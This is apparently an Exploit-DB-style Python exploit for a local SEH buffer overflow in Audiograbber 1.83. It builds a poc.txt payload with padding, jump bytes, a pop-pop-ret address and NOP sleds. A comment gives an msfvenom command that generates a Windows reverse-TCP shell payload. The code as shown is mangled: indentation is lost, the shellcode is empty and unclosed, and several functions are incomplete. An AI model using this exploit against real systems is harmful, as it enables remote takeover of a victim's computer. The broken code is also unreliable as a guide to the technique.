# Exploit Title: Audiograbber 1.83 - Local Buffer Overflow (SEH)
# Date: 2018-06-16
# Exploit Author: Dennis 'dhn' Herrmann
# Vendor Homepage: https://www.audiograbber.org/
# Version: 1.83
# Tested on: Windows 7 SP1 (x86)
#!/usr/bin/env python
# $Id: exploit.py,v 1.0 2018/06/16 13:25:59 dhn Exp $
# Tested with Windows 7 SP1 (x86)
# Steps:
#- Paste "poc.txt" content in the "Interpret" or "Album" field
class Exploit:
def __init__(self, shellcode):
self._shellcode = shellcode
self._payload = None
def __write(self):
f = open("poc.txt", "w")
def run(self):
pattern = "A" * 256
jmp_short = "\xeb\x08\x90\x90"# short JMP
pop2ret = "\x79\x91\x01\x10"# WMA8Connect.dll
self._payload = pattern
self._payload += jmp_short
self._payload += pop2ret
# The buffer is mangled so we have to jump
# over the parts to reached our shellcode
self._payload += "\x90" * 18 + jmp_short
self._payload += "\x90" * 28 + jmp_short
self._payload += "\x90" * 32 + self._shellcode
def main():
# msfvenom --platform windows -p windows/shell_reverse_tcp \
# LHOST= LPORT=443 -b "\x00\x0a\x0d" \
# -e x86/alpha_mixed -f py
shellcode = (
exploit = Exploit(shellcode)
if __name__ == "__main__":